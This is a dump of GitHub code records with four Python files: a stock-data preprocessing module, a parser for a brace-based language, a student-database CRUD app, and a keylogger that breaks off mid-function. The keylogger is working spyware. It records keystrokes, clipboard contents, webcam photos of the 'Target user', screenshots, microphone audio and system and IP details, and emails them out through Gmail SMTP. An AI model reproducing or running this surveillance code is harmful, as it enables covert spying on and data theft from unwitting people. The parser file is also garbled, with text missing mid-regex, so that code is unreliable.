+{"seq_id":"19564396187","text":"import os\nimport json\nimport numpy as np\nimport pandas as pd\n\nfrom copy import deepcopy\nfrom stockanalysis.text_normalization_methods import normalize_document\n\n######################\n## Helper Functions ##\n######################\n\ndef append_vocab(document, file_path):\n \"\"\"\n Adds to the already existing vocabulary file found at :param file_path: the\n new vocabulary found in the normalized document :param document:.\n\n :param document: string, normalized document to calculate vocabulary from.\n :param file_path: string, path to vocabulary json file\n\n ---> dict, vocab object, mapping words to their unique integer encodings\n \"\"\"\n\n # Loading already established vocabulary\n try:\n with open(file_path, 'r') as f:\n vocab = json.load(f)\n\n except FileNotFoundError:\n vocab = {}\n\n # Updating vocabulary dictionary\n if not vocab:\n last_word_encoding = 0\n else:\n last_word_encoding = max(vocab.values())\n\n for word in document.split():\n # if a word in the document is not in the current vocab, add it with a\n # word encoding value larger than the largest word encoding value\n if word not in vocab:\n vocab[word] = last_word_encoding + 1\n last_word_encoding = last_word_encoding + 1\n\n with open(file_path, 'w') as f:\n json.dump(vocab, f)\n\n return vocab\n\n##########################\n## END Helper Functions ##\n##########################\n\n\n###########################################################\n## Functions for preprocessing dataset pandas.DataFrames ##\n###########################################################\n\ndef time_series_split(df, train_size=None, test_size=None):\n \"\"\"\n Splits the dataset into train, validation, and test portions.\n\n :param df: pandas.DataFrame, representing our total dataset\n :param train_size: float, training set size\n :param test_size: float, test set size\n\n ---> pandas.DataFrame, pandas.DataFrame, pandas.DataFrame, representing the train, validation, test datasets\n \"\"\"\n\n dataset_size = len(df)\n\n if test_size != None:\n testset_index = int(test_size*dataset_size)\n elif train_size != None:\n testset_index = int((1 - train_size)*dataset_size)\n else:\n raise Exception('train_size and or test_size needs to be set')\n\n test_df = df.iloc[0:testset_index].copy(deep=True)\n train_df = df.iloc[testset_index:].copy(deep=True)\n\n return train_df, test_df\n\ndef window_df(df, columns, n_trail=1, n_lead=1):\n \"\"\"\n :param df: DataFrame, dataframe object where the columns are the features\n and labels and the rows are days\n :param columns: list of strings, names of the features and labels\n (columns of df) to be used in the time series\n :param n_trail: int, number of days behind day 0 that will be used to\n predict days after day 0\n :param n_lead: int, number of days ahead of day 0 that will be predicted\n\n ---> pandas.DataFrame, dataframe object structured like a time series\n where each row represents an element in the time series, and each\n column is a feature or label a certain amount of days in the future\n or past.\n \"\"\"\n\n df = df[columns]\n dfs = []\n col_names = []\n\n # Create trailing columns\n for i in range(n_trail, 0, -1):\n dfs.append(df.shift(-i))\n col_names += [(col_name + '(t-{})'.format(i)) for col_name in columns]\n\n # Create leading columns\n for i in range(0, n_lead+1):\n dfs.append(df.shift(i))\n col_names += [(col_name + '(t+{})'.format(i)) for col_name in columns]\n\n agg = pd.concat(dfs, axis=1)\n agg.columns = col_names\n\n agg.dropna(inplace=True)\n\n return agg\n\ndef extract_dataset(df, fcols, tcols, lag, forecast, single_step):\n \"\"\"\n lag must > 0 same with forecast\n \"\"\"\n\n w_df = window_df(df, set(fcols+tcols), n_trail=lag-1, n_lead=forecast)\n\n features = {fcol: w_df[\n [col\n for col in w_df.columns if fcol in col][:-forecast]\n ].values\n for fcol in fcols}\n if single_step:\n targets = {'_'.join([tcol, 'target']): w_df[\n [col\n for col in w_df.columns\n if tcol in col][-1]\n ].values\n for tcol in tcols}\n else:\n targets = {'_'.join([tcol, 'target']): w_df[\n [col\n for col in w_df.columns\n if tcol in col][-forecast:]\n ].values\n for tcol in tcols}\n\n return features, targets\n\n###############################################################\n## END Functions for preprocessing dataset pandas.DataFrames ##\n###############################################################\n\n\n##########################################\n## Functions for preprocessing datasets ##\n##########################################\n\ndef sample_text_feature(feature, seed):\n \"\"\"\n \"\"\"\n\n def sample_element(el):\n texts = []\n for timestep in el:\n days_texts = json.loads(timestep)\n texts.extend(days_texts)\n if texts:\n text = np.random.choice(texts, size=1)[0]\n else:\n text = np.nan\n return text\n\n np.random.seed(seed)\n\n sampled_feature = np.asarray(list(map(sample_element, feature)))\n\n return sampled_feature\n\n\ndef norm_text_feature(feature, cut_off, norm_dir):\n \"\"\"\n \"\"\"\n\n def norm_text(link):\n print(link)\n if link == 'nan':\n norm_link = link\n else:\n root, doc_name = os.path.split(link)\n save_point = os.path.join(root, norm_dir)\n if not os.path.exists(save_point):\n os.makedirs(save_point)\n\n norm_link = os.path.join(save_point, doc_name)\n\n with open(link, 'r') as file:\n raw_document = file.read()\n norm_doc = normalize_document(raw_document,\n remove_large_words=cut_off)\n with open(norm_link, 'w') as norm_file:\n norm_file.write(norm_doc)\n return norm_link\n\n normed_feature = np.asarray(list(map(norm_text, feature)))\n\n return normed_feature\n\ndef encode_text_feature(feature, vocab):\n \"\"\"\n \"\"\"\n\n def encode_text(link):\n if link == 'nan':\n encoded_text = []\n else:\n with open(link, 'r') as f:\n text = f.read()\n encoded_text = [vocab.get(word, 0) for word in text.split()]\n return np.asarray(encoded_text)\n\n encoded_feature = np.asarray(list(map(encode_text, feature)))\n\n return encoded_feature\n\ndef pad_text_feature(feature):\n \"\"\"\n \"\"\"\n\n doc_lens = map(lambda arr: arr.shape[-1], feature)\n longest_doc_len = max(doc_lens)\n pad_doc = lambda arr: np.pad(arr, ((0, longest_doc_len - arr.shape[-1])),\n constant_values=0)\n return np.stack(list(map(pad_doc, feature)), axis=0)\n\ndef transform_ds(dataset, fnames, func, **params):\n \"\"\"\n \"\"\"\n\n features, targets = deepcopy(dataset)\n\n for fname in fnames:\n features[fname] = func(features[fname], **params)\n\n return features, targets\n\ndef shuffle_dataset(dataset, seed):\n \"\"\"\n \"\"\"\n\n np.random.seed(seed)\n features, labels = dataset\n dataset_size = len(next(iter(features.values())))\n shuffled_indices = np.random.choice(dataset_size, size=dataset_size,\n replace=False)\n features_shuffled = {fname: feature[shuffled_indices]\n for fname, feature in features.items()}\n labels_shuffled = {lname: label[shuffled_indices]\n for lname, label in labels.items()}\n return features_shuffled, labels_shuffled\n\n# Functions for building vocabularies from datasets\n\ndef gen_feature_vocab(feature, path_to_vocab):\n \"\"\"\n \"\"\"\n\n def text_vocab(link):\n if link != 'nan':\n with open(link, 'r') as f:\n text = f.read()\n vocab = append_vocab(text, path_to_vocab)\n return None\n\n for link in feature:\n text_vocab(link)\n\n return None\n\ndef gen_vocabulary(dataset, fnames, path_to_vocab):\n \"\"\"\n \"\"\"\n\n features, targets = dataset\n\n for fname in fnames:\n gen_feature_vocab(features[fname], path_to_vocab)\n\n return None\n\ndef build_vocabulary(dataset, fnames, path_to_vocab):\n \"\"\"\n \"\"\"\n\n if os.path.isfile(path_to_vocab):\n os.remove(path_to_vocab)\n gen_vocabulary(dataset, fnames, path_to_vocab)\n with open(path_to_vocab, 'r') as f:\n vocab = json.load(f)\n\n return vocab\n\n\n# END functions for building vocabularies from datasets\n\n# Helper postprocessing functions\n\ndef encode_pad_dataset(dataset, fnames, vocab):\n \"\"\"\n \"\"\"\n\n encoded_ds = transform_ds(dataset, fnames, encode_text_feature, vocab=vocab)\n padded_ds = transform_ds(encoded_ds, fnames, pad_text_feature)\n\n return padded_ds\n\n# END helper postprocessing functions\n\n##############################################\n## END Functions for preprocessing datasets ##\n##############################################\n\n\n#############################\n## Preprocessing functions ##\n#############################\n\ndef preprocess(df, feature_tickers, target_tickers, feature_names, target_names,\n lag, forecast, single_step, **kwargs):\n \"\"\"\n \"\"\"\n\n fcols = ['_'.join([n, t]) for n in feature_names for t in feature_tickers]\n tcols = ['_'.join([n, t]) for n in target_names for t in target_tickers]\n\n ds = extract_dataset(df, fcols, tcols, lag, forecast, single_step)\n\n if '8-k' in feature_names:\n # Getting text preprocessing parameters\n norm_dir = kwargs.get('norm_dir', 'norm')\n seed = kwargs.get('seed', None)\n try:\n cut_off = kwargs['cut_off']\n except KeyError as e:\n msg = 'preprocess() missing key word argument: \'cut_off\'. Argument is required when \'feature_names\' includes \'8-k\' as a feature to preprocess.'\n raise TypeError(msg) from e\n\n fcols_8k = ['_'.join(['8-k', t]) for t in feature_tickers]\n\n # Downsampling 8-K features to 1 document per sample\n ds = transform_ds(ds, fcols_8k, sample_text_feature, seed=seed)\n # Normalizing all text documents in the dataset\n ds = transform_ds(ds, fcols_8k, norm_text_feature, cut_off=cut_off,\n norm_dir=norm_dir)\n return ds\n\n#################################\n## END Preprocessing functions ##\n#################################\n","repo_name":"Evbor/Stock_Analysis","sub_path":"stockanalysis/preprocess.py","file_name":"preprocess.py","file_ext":"py","file_size_in_byte":10971,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"}
+{"seq_id":"26804501597","text":"import re\n\nfrom ._parse_common import SEP_STR, NOT_OP, \\\n DoNotSkip, NoLastID, check_skip, Form, _ch_is, _form_to_ch, Node, \\\n _node_is, _create_node\nfrom ._error import CantParse, ParseError\nfrom ._normalize import _shrink_separator_span\n# read forward in the source to get the name of the operator\n# stops when it finds an unescaped separator or brace\noperator_reader = re.compile(r'^(?:`[`\\n\\t {}]|[^`\\n\\t {}])+')\n# find unescaped open braces\nunesc_opens = re.compile(r'(? 1 else 0\n ].span()[0],\n idx + closes_after[\n 1 if len(closes_after) > 1 else 0\n ].span()[1]\n )\n\n\ndef _brace_match(fname, source):\n '''\n find unmatched braces in the source.\n\n matches from left-to-right. in `{ { }`, the first open brace will be\n found to match the close brace, so the second open brace will be\n considered stray and reported as an error.\n\n similarly, in `{ } }`, the first pair of braces will match, and the\n last brace will be considered stray.\n '''\n # should escape the next char / have we seen an open brace yet\n escape_next = seen_open = False\n depth = 0\n line = col = 1\n # total number of unescaped close braces for the entire source\n count_close = _count_found(unesc_closes, source)\n for idx, ch in enumerate(source):\n if escape_next:\n escape_next = False\n # print(f\"escaped {repr(ch)} at {idx} ({line}:{col-1})\")\n col += 1\n continue\n\n if ch == ESCAPE:\n escape_next = True\n elif ch == '\\n':\n col = 1\n line += 1\n continue\n\n elif _ch_is(ch, Form.OPEN):\n # looking for STRAY OPENS\n seen_open = True\n depth += 1\n offset = 2\n # there are no close braces in this program\n if count_close == 0:\n raise ParseError(fname, CantParse.STRAY_OPEN, source,\n idx - offset, len(source), offset,\n idx, line, col)\n\n # we have gone deeper than we can return from\n if depth > count_close:\n begin, end = _create_context(source, idx)\n raise ParseError(fname, CantParse.STRAY_OPEN, source, begin,\n end, idx - begin, idx, line, col)\n\n elif _ch_is(ch, Form.CLOSE):\n # looking for STRAY CLOSES\n depth -= 1\n offset = 2\n if not seen_open:\n raise ParseError(fname, CantParse.STRAY_CLOSE, source, 0,\n idx + offset, 0, idx, line, col)\n if depth < 0:\n begin, end = _create_context(source, idx)\n raise ParseError(fname, CantParse.STRAY_CLOSE, source, begin,\n end, idx - begin, idx, line, col)\n col += 1\n return depth\n\n\ndef _parse_to_tree(source, fname, strip=False, skip_to_idx=DoNotSkip, depth=0, line=1, col=1):\n if depth == 0 and _unbalanced_braces(source):\n _brace_match(fname, source)\n return [{}]\n\n building = []\n escape_next = False\n last_id = NoLastID\n\n idx = 0\n for idx, ch in enumerate(source):\n # print(\n # '>' * (depth + 1)\n # + f\"\\tidx: {idx}\\t({line}:{col})\\tch: {repr(ch)} \\t-> {skip_to_idx}\"\n # f\"({repr(source[skip_to_idx]) if skip_to_idx < len(source) else ''})\"\n # )\n # aka idx < skip_to_idx\n if skip_to_idx > idx:\n continue\n if skip_to_idx == idx:\n skip_to_idx = DoNotSkip\n if not escape_next and ch == ESCAPE:\n escape_next = True\n continue\n\n # passed the target or we are closing a form: return\n # aka idx > skip_to_idx\n if skip_to_idx < idx or (not escape_next and _ch_is(ch, Form.CLOSE)):\n return building, idx, line, col\n\n if not escape_next and ch in SEP_STR:\n if ch == '\\n':\n line += 1\n col = 1\n else:\n col += 1\n # omit the separator in { A} {A } {A {B}} {{A} B} { {A} {B} }\n if strip:\n if idx in (0, len(source) - 1):\n continue\n\n next_ch = source[idx + 1]\n\n if next_ch in SEP_STR:\n sep_node, skip_to_idx = _shrink_separator_span(\n True, source, idx, last_id\n )\n\n check_skip(skip_to_idx)\n\n last_id = Node.SEPARATOR\n building.extend(sep_node)\n continue\n\n # NOTE: skip the separator if we are NOT between two operators\n # the only semantic separators in { A} {A } {A A} {A {B}}\n # {{A} B} { {A} {B} } etc\n # are in {A A}\n if not (_node_is(last_id, Node.OPERATOR)\n and next_ch not in NOT_OP):\n continue\n\n last_id = Node.SEPARATOR\n building.append(\n _create_node(Node.SEPARATOR, SEP_STR.index(ch))\n )\n\n elif not escape_next and _ch_is(ch, Form.OPEN):\n operand, skip_to_idx, line, col = _parse_to_tree(\n source,\n fname,\n strip=strip,\n skip_to_idx=idx + 1,\n depth=depth + 1,\n line=line,\n col=col\n )\n\n check_skip(skip_to_idx)\n\n building.append( _create_node(Node.OPERAND, operand) )\n last_id = Node.OPERAND\n skip_to_idx += 1\n col += 1\n\n elif ch not in NOT_OP:\n match = _operator_name(source[idx:])\n building.append( _create_node(Node.OPERATOR, match.group()) )\n last_id = Node.OPERATOR\n skip_to_idx = idx + match.span()[1]\n col += match.span()[1] + 1\n escape_next = False\n else:\n raise ValueError(ch, 'parser bug found!')\n\n return building, idx, line, col\n\n\ndef _parse(source, fname='input', strip=False):\n return [ *_parse_to_tree(source, fname, strip) ][0]\n\n\ndef _parse_file(fp, fname='input', strip=False):\n return _parse(fp.read().rstrip('\\n\\r'), fname, strip)\n","repo_name":"catb0t/ast-schemas","sub_path":"om/ompy/parser/_parse.py","file_name":"_parse.py","file_ext":"py","file_size_in_byte":7489,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"}
+{"seq_id":"24707980294","text":"import requests, json\nimport mysql.connector\nimport os\nimport time\nimport sys\nfrom tabulate import tabulate\n\nheaders = {\n 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0',\n 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',\n 'Accept-Language': 'en-US,en;q=0.5',\n 'Alt-Used': 'api.abcfdab.cfd',\n 'Connection': 'keep-alive',\n 'Upgrade-Insecure-Requests': '1',\n 'Sec-Fetch-Dest': 'document',\n 'Sec-Fetch-Mode': 'navigate',\n 'Sec-Fetch-Site': 'none',\n 'Sec-Fetch-User': '?1',\n 'TE': 'trailers',\n}\nconfig=mysql.connector.connect(host=\"localhost\", user=\"root\", password=\"\", database=\"db_akademik_0572\")\ndef animate():\n #animation = [\"10%\", \"20%\", \"30%\", \"40%\", \"50%\", \"60%\", \"70%\", \"80%\", \"90%\", \"100%\"]\n animation = [\"[■□□□□□□□□□]\",\"[■■□□□□□□□□]\", \"[■■■□□□□□□□]\", \"[■■■■□□□□□□]\", \"[■■■■■□□□□□]\", \"[■■■■■■□□□□]\", \"[■■■■■■■□□□]\", \"[■■■■■■■■□□]\", \"[■■■■■■■■■□]\", \"[■■■■■■■■■■]\"]\n\n print(\"Database terhubung dan menyiapkan API untuk diimport ke database\")\n for i in range(len(animation)):\n time.sleep(0.2)\n sys.stdout.write(\"\\r\" + animation[i % len(animation)])\n sys.stdout.flush()\n\ndef api2db():\n api_url=\"https://api.abcfdab.cfd/students/\"\n response = requests.get(api_url, headers=headers).json()\n for id in range(0,50):\n data_response=response['data'][id]\n id=data_response['id']\n nim=data_response['nim']\n nama=data_response['nama']\n jk=data_response['jk']\n jurusan=data_response['jurusan']\n alamat=data_response['alamat']\n config.reconnect()\n cursor = config.cursor()\n cursor.execute(\"INSERT INTO tbl_students_0572 (id, nim, nama, jk, jurusan, alamat) VALUES (%s, %s, %s, %s, %s, %s)\", (id, nim, nama, jk, jurusan, alamat))\n config.commit()\n print(f\"\\nData dengan NIM : {nim} telah berhasil diimport kedalam database!\")\n print(\"\\nSemua data berhasil diimport!\\n\")\n # print(f\"Nama : {nama}\\nNim : {nim}\\nJenis Kelamin : {jk}\\nJurusan : {jurusan}\\nAlamat : {alamat}\\n\\n\")\ndef menu():\n print(\"\\n=== Main Menu ===\")\n print(\"[1] Lihat Daftar Mahasiswa\")\n print(\"[2] Buat Mahasiswa Baru\")\n print(\"[3] Edit Mahasiswa\")\n print(\"[4] Hapus Mahasiswa\")\n print(\"[5] Cari Mahasiswa\")\n print(\"[0] Exit\")\n print(\"------------------------\")\n pilihan_menu = input(\"Pilih menu> \")\n \n if(pilihan_menu == \"1\"):\n tampilkan_mahasiswa()\n elif(pilihan_menu == \"2\"):\n buat_mahasiswa()\n elif(pilihan_menu == \"3\"):\n edit_mahasiswa()\n elif(pilihan_menu == \"4\"):\n hapus_mahasiswa()\n elif(pilihan_menu == \"5\"):\n cari_mahasiswa()\n elif(pilihan_menu == \"0\"):\n exit()\n else:\n print(\"Inputan salah!\")\n kembali_ke_menu()\ndef kembali_ke_menu():\n print(\"\\n\")\n input(\"Tekan Enter untuk kembali...\")\n menu()\ndef tampilkan_mahasiswa():\n tampil=input(\"\"\"\n1. Tampilkan seluruh Mahasiswa\n2. Tampilkan Mahasiswa berdasarkan limit\n3. Tampilkan Mahasiswa berdasarkan kecocokan nama\ninput> \"\"\")\n if tampil==\"1\":\n\n config.reconnect()\n cursor = config.cursor()\n cursor.execute('SELECT * FROM tbl_students_0572')\n result = cursor.fetchall()\n cursor.close()\n table=[]\n\n for row in result:\n data=[row[0],row[1],row[2],row[3],row[4],row[5]]\n table.append(data)\n print(tabulate(table,headers=[\"ID\",\"NIM\",\"NAMA\",\"Jenis Kelamin\",\"Jurusan\",\"Alamat\"],tablefmt=\"pretty\"))\n menu()\n elif tampil==\"2\":\n limit_set=input(\"Limit yang Anda inginkan : \")\n config.reconnect()\n cursor = config.cursor()\n cursor.execute('SELECT * FROM tbl_students_0572 LIMIT %s', (limit_set, ))\n result = cursor.fetchall()\n cursor.close()\n table=[]\n for row in result:\n data=[row[0],row[1],row[2],row[3],row[4],row[5]]\n table.append(data)\n print(tabulate(table,headers=[\"ID\",\"NIM\",\"NAMA\",\"Jenis Kelamin\",\"Jurusan\",\"Alamat\"],tablefmt=\"pretty\"))\n menu()\n elif tampil==\"3\":\n nama_cari=input(\"Nama yang ingin Anda tampilkan :\")\n config.reconnect()\n cursor = config.cursor()\n cursor.execute('SELECT * FROM tbl_students_0572 WHERE nama LIKE %s', (\"%\" + nama_cari + \"%\",))\n result = cursor.fetchall()\n cursor.close()\n table=[]\n for row in result:\n data=[row[0],row[1],row[2],row[3],row[4],row[5]]\n table.append(data)\n print(tabulate(table,headers=[\"ID\",\"NIM\",\"NAMA\",\"Jenis Kelamin\",\"Jurusan\",\"Alamat\"],tablefmt=\"pretty\")) \n menu()\n else:\n input(\"Inputan yang Anda masukkan salah\\n\\nTekan enter untuk kembali\")\n tampilkan_mahasiswa()\ndef buat_mahasiswa():\n nim = input(\"NIM Mahasiswa (xx.xx.xxxx) : \")\n nama = input(\"Nama Mahasiswa : \")\n jk = input(\"Jenis Kelamin Mahasiswa (L/P) : \")\n jurusan = input(\"Jurusan Mahasiswa : \")\n alamat = input(\"Alamat Mahasiswa : \")\n config.reconnect()\n cur = config.cursor()\n cur.execute('INSERT INTO tbl_students_0572 (nim, nama, jk, jurusan, alamat) VALUES (%s, %s, %s, %s, %s)', (nim, nama, jk, jurusan, alamat))\n config.commit()\n print(f\"\\nData dengan NIM : {nim}\\nTelah terinput!\\n\") \n time.sleep(2) \n menu()\ndef edit_mahasiswa():\n cari_nim=input(\"Cari NIM Mahasiswa yang ingin anda ganti : \")\n config.reconnect()\n cur = config.cursor()\n cur.execute('SELECT * FROM tbl_students_0572 WHERE nim LIKE %s', (\"%\" + cari_nim + \"%\",))\n res = cur.fetchall()\n cur.close()\n print(f\"\\nNIM yang sesuai dengan {cari_nim} : \\n\")\n table=[]\n for row in res:\n data=[row[0],row[1],row[2],row[3],row[4],row[5]]\n table.append(data)\n print(tabulate(table,headers=[\"ID\",\"NIM\",\"NAMA\",\"Jenis Kelamin\",\"Jurusan\",\"Alamat\"],tablefmt=\"pretty\"))\n nim_cari=input(\"\\nMasukkan NIM yang ingin di edit secara lengkap (xx.xx.xxxx) :\")\n print(f\"\\nGanti data {nim_cari}\\n\")\n nim = input(\"NIM Mahasiswa baru (xx.xx.xxxx) : \")\n nama = input(\"Nama Mahasiswa baru : \")\n jk = input(\"Jenis Kelamin Mahasiswa baru (L/P) : \")\n jurusan = input(\"Jurusan Mahasiswa baru : \")\n alamat = input(\"Alamat Mahasiswa baru : \")\n config.reconnect()\n cur = config.cursor()\n cur.execute('UPDATE tbl_students_0572 SET nim=%s, nama=%s, jk=%s, jurusan=%s, alamat=%s WHERE nim=%s', (nim, nama, jk, jurusan, alamat, nim_cari))\n config.commit() \n print(f\"\\nData dengan NIM : {nim}\\nTelah terupdate!\\n\") \n time.sleep(2)\n menu()\ndef cari_mahasiswa():\n cari_nim=input(\"Cari NIM Mahasiswa yang ingin anda ganti : \")\n config.reconnect()\n cur = config.cursor()\n cur.execute('SELECT * FROM tbl_students_0572 WHERE nim LIKE %s', (\"%\" + cari_nim + \"%\",))\n res = cur.fetchall()\n cur.close()\n print(f\"\\nNIM yang sesuai dengan {cari_nim} : \\n\")\n table=[]\n for row in res:\n data=[row[0],row[1],row[2],row[3],row[4],row[5]]\n table.append(data)\n print(tabulate(table,headers=[\"ID\",\"NIM\",\"NAMA\",\"Jenis Kelamin\",\"Jurusan\",\"Alamat\"],tablefmt=\"pretty\"))\n menu()\ndef hapus_mahasiswa():\n cari_nim=input(\"Cari NIM Mahasiswa yang ingin anda hapus : \")\n config.reconnect()\n cur = config.cursor()\n cur.execute('SELECT * FROM tbl_students_0572 WHERE nim LIKE %s', (\"%\" + cari_nim + \"%\",))\n res = cur.fetchall()\n cur.close()\n print(f\"\\nNIM yang sesuai dengan {cari_nim} : \\n\")\n table=[]\n for row in res:\n data=[row[0],row[1],row[2],row[3],row[4],row[5]]\n table.append(data)\n print(tabulate(table,headers=[\"ID\",\"NIM\",\"NAMA\",\"Jenis Kelamin\",\"Jurusan\",\"Alamat\"],tablefmt=\"pretty\"))\n nim_cari=input(\"\\nMasukkan NIM yang ingin di edit secara lengkap (xx.xx.xxxx) :\")\n config.reconnect()\n cur = config.cursor()\n cur.execute('DELETE FROM tbl_students_0572 WHERE nim=%s', (nim_cari,))\n config.commit()\n print(f\"\\nData dengan NIM : {nim_cari}\\nTelah terhapus!\\n\") \n time.sleep(2)\n menu()\nif __name__ == '__main__':\n if config.is_connected():\n print('Database sudah terhubung\\n')\n cursor = config.cursor()\n sql = \"\"\"SELECT count(*) as tot FROM tbl_students_0572\"\"\"\n cursor.execute(sql)\n data = cursor.fetchone()\n config.close()\n cek_table=data[0]\n if cek_table==0:\n animate()\n api2db()\n print(\"\\nMemasuki menu utama\")\n time.sleep(2)\n menu() \n else:\n print(\"Data sudah ada, memasuki menu utama\")\n time.sleep(2)\n menu()\n \n#20.83.0572_Raihan Rinto Andiansyah\n","repo_name":"zeromount/uas-pemrograman-python-0572","sub_path":"fetch_input2db_0572.py","file_name":"fetch_input2db_0572.py","file_ext":"py","file_size_in_byte":8798,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"}
+{"seq_id":"33931079","text":"from email.message import EmailMessage # Import for sending Email\r\nimport smtplib # This import is for SMTP protocol\r\n# These are mainly used for absolute path concatenation with filenames\r\nimport os\r\nfrom os import listdir\r\nfrom os.path import isfile, join\r\n\r\nimport socket\r\nimport platform\r\nimport win32clipboard # This is for import for clipboard for windows\r\nfrom pynput.keyboard import Key, Listener # These are main imports for Keylogger\r\n\r\nimport time # This is used for timer\r\n# \".wav\" is the format used for saving audio recordings.\r\nfrom scipy.io.wavfile import write\r\nimport sounddevice as sd\r\n\r\nfrom requests import get\r\n\r\nfrom PIL import ImageGrab # For screenshots\r\nimport cv2 # This is for OpenCV, Image Capture through Webcam\r\nimport threading # I am using threading to run parallel process,so threading based import\r\n\r\nkeys_information = \"key_log_trial.txt\" # Record Keystrokes\r\nsystem_information = \"systeminfo_trial.txt\" # Record System Info\r\nclipboard_information = \"clipboard_trial.txt\" # Record Copy paste content\r\naudio_information = \"audio_trial\" # Record audio of user\r\nscreenshot_information = \"screenshot_trial\" # Screen record image\r\n\r\nfile_path = \" Enter the file path to which you want to store the result \" # Filepath of project\r\nextend = \"\\\\\" # Just an extension for path symbol\r\nemail_address = \"Email Address\" # From email address\r\npassword = \" Password\" # Password\r\ntoaddr = \" Enter To Address Email\"\r\n\r\nmicrophone_time = 20 # Microphone recording time period\r\ncount = 0 # This is another counter keeping tab of no.of keys pressed\r\nkeys = [] # This keep tab of the keys pressed\r\nstoppingTime = time.time() + 30 # This is the timer for which keys are recorded\r\n\r\n\r\ndef on_press(key): # Fn to tell what to do when a key is pressed\r\n global keys, count, currentTime\r\n\r\n print(key) # I am printing the keys onto the terminal\r\n keys.append(key) # Append the key pressed to keys list\r\n count += 1 # Updating the counter by 1\r\n currentTime = time.time() # Getting the present time\r\n\r\n if count >= 1: # If count is non-zero\r\n count = 0 # Reset counter to zero\r\n write_file(keys) # Write keys list to file\r\n keys = [] # Reinitialise keys list\r\n\r\ndef write_file(keys): # Fn specifying how to write to file\r\n with open(file_path + extend + keys_information, \"a\") as f: # Opening file\r\n for key in keys: # Paring through keys list\r\n k = str(key).replace(\"'\", \"\") # All keys are enclosed in single quotes,I am removing them\r\n if k.find(\"space\") > 0: # If space key is found\r\n f.write('Key.Space') # I am writing Key.Space\r\n f.close() # Close the file\r\n\r\n elif k.find(\"Key\") == -1: # For any other key\r\n f.write(k) # Write that key\r\n f.close() # Close the file\r\n\r\ndef on_release(key): # Fn telling when to release or stop listening\r\n if key == Key.esc: # If escape key is pressed,then stop listening\r\n return False\r\n if currentTime > stoppingTime: # If current time exceeds set time,then stop listening\r\n return False\r\n\r\ndef computer_information(): # Fn to find computer system information\r\n with open(file_path + extend + system_information, \"a\") as f: # To open the file in append mode\r\n hostname = socket.gethostname() # To get hostname\r\n IPAddr = socket.gethostbyname(hostname) # To get IP address\r\n try:\r\n public_ip = get(\"https://api.ipify.org\").text # Using API to get public IP,but this has limit for free use so in try-except\r\n f.write(\"Public IP Address: \" + public_ip) # To get Public IP address\r\n\r\n except Exception:\r\n f.write(\"Couldn't get Public IP Address(most likely max query)\") # Any possible exception\r\n\r\n f.write(\"Processor: \" + (platform.processor()) + '\\n') # To find Processor\r\n f.write(\"System: \" + platform.system() + \" \" + platform.version() + '\\n') # To find Platform(Windows here) and Version\r\n f.write(\"Machine: \" + platform.machine() + '\\n') # To find Platform machine(AMD64 in my case)\r\n f.write(\"Hostname: \" + hostname + '\\n') # To find Hostname\r\n f.write(\"Private IP Address: \" + IPAddr + '\\n') # To find IP Address\r\n\r\ndef copy_clipboard(): # Fn to copy clipboard information\r\n with open(file_path + extend + clipboard_information, \"a\") as f: # To open file\r\n try:\r\n win32clipboard.OpenClipboard() # To open Clipboard\r\n pasted_data = win32clipboard.GetClipboardData() # To get Clipboard Data\r\n win32clipboard.CloseClipboard() # Close Clipboard\r\n\r\n f.write(\"Clipboard Data: \\n\" + pasted_data) # Write copied data to file\r\n\r\n except:\r\n f.write(\"Clipboard could be not be copied\") # In case of any internal errors due to Windows\r\n\r\ndef send_email(toaddr): # To send email\r\n fromaddr = email_address # From Address\r\n msg = EmailMessage() # Email Constructor\r\n msg['From'] = fromaddr # From Address\r\n msg[\"To\"] = toaddr # To Address\r\n msg[\"Subject\"] = \"Keylogger exploits:\" # Subject line\r\n msg.set_content('Contains attachments for Keylogger,Screenshots,Audio Clips,Webcam Images,Clipboard and System Settings') # EMail Body\r\n\r\n files_in_dir = [f for f in listdir('File path') if isfile(join('File Path', f))]\r\n #print(files_in_dir) # files_in_dir is used to retrieve all files in keylogger/trial directory\r\n outdir = 'File Path'\r\n for file in files_in_dir: # Looping through each file in directory,read file,give filename and adding attachment\r\n with open(os.path.join(outdir, file), 'rb') as f:\r\n file_data = f.read() # Read file\r\n file_name = f.name # Name of the file\r\n\r\n msg.add_attachment(file_data, maintype = 'application', subtype = 'octet-stream', filename = file_name) # Add attachment\r\n\r\n with smtplib.SMTP('smtp.gmail.com', 587) as smtp: # SMTP protocol with port 587\r\n smtp.starttls() # Starting Transport Layer Security(TLS)\r\n smtp.login(fromaddr, password) # Login to from email using email and password\r\n smtp.send_message(msg) # Send message\r\n\r\ndef Camera_Capture(number_of_iterations):\r\n cam = cv2.VideoCapture(0, cv2.CAP_DSHOW) # Create an object of class VideoCapture using Webcam 0 and DirectShow API Preference\r\n ret, frame = cam.read() # Capture webcam image by frame (return value,image)\r\n img_name = \"Target user pic at \" # For Naming file\r\n outdir = 'File Path'\r\n cv2.imwrite(os.path.join(outdir , img_name + str(number_of_iterations) + \" iteration.png\"), frame) # Write the given frame with the given name\r\n cam.release() # Release resources\r\n\r\ndef microphone(number_of_iterations):\r\n fs = 44100 # Sampling frequency\r\n seconds = microphone_time # Time for which microphone is active\r\n\r\n myrecording = sd.rec(int(seconds * fs), samplerate=fs, channels=2) # sd(SoundDevice library) records microphone\r\n sd.wait() #To pause/stop recording\r\n\r\n write(file_path + extend + audio_information + str(number_of_iterations) + \".wav\", fs, myrecording) # Saving file\r\n\r\ndef screenshot(number_of_iterations):\r\n im = ImageGrab.grab() # Take a screenshot\r\n im.save(file_path + extend + screenshot_information + str(number_of_iterations) +\".png\") # Save file\r\n\r\ndef logger1():\r\n with Listener(on_press=on_press, on_release=on_release) as listener: # listener that starts with on_press fn and stops with on_release fn\r\n listener.join()\r\ndef logger2(n):\r\n copy_clipboard()\r\n Camera_Capture(n)\r\n screenshot(n)\r\n microphone(n)\r\n send_email(toaddr)\r\n\r\ndef main():\r\n\r\n computer_information()\r\n t1 = threading.Thread(target = logger1) # Creating thread with logger1 fn to be executed\r\n t2 = threading.Thread(target=logger2, args = [1]) # Creating thread with logger2 fn to be executed\r\n 